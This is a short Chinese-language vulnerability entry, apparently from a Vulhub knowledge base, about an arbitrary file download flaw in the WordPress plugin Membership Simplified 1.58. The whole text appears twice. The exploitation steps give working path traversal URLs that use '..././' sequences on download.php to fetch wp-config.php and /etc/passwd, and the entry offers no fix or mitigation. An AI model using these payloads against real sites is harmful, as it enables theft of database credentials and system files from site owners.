VULHUB ™

### 漏洞名称：Wordpress Plugin Membership Simplified 1.58 - 任意文件下载 ### 漏洞类型：任意文件下载 ### 漏洞影响：Membership Simplified 1.58 ### 漏洞存在url: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php ### 漏洞详情： /wp-content/plugins/membership-simplified-for-oap-members-only/download.php 漏洞在download.php文件 使用参数download_file进行文件的下载，未进行任何防御，导致任意文件下载漏洞。 ### 漏洞利用 1、下载wp-config.php文件 /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././wp-config.php 2、下载/etc/passwd文件 /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd

### 漏洞名称：Wordpress Plugin Membership Simplified 1.58 - 任意文件下载 ### 漏洞类型：任意文件下载 ### 漏洞影响：Membership Simplified 1.58 ### 漏洞存在url: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php ### 漏洞详情： /wp-content/plugins/membership-simplified-for-oap-members-only/download.php 漏洞在download.php文件 使用参数download_file进行文件的下载，未进行任何防御，导致任意文件下载漏洞。 ### 漏洞利用 1、下载wp-config.php文件 /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././wp-config.php 2、下载/etc/passwd文件 /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././..././..././..././..././..././etc/passwd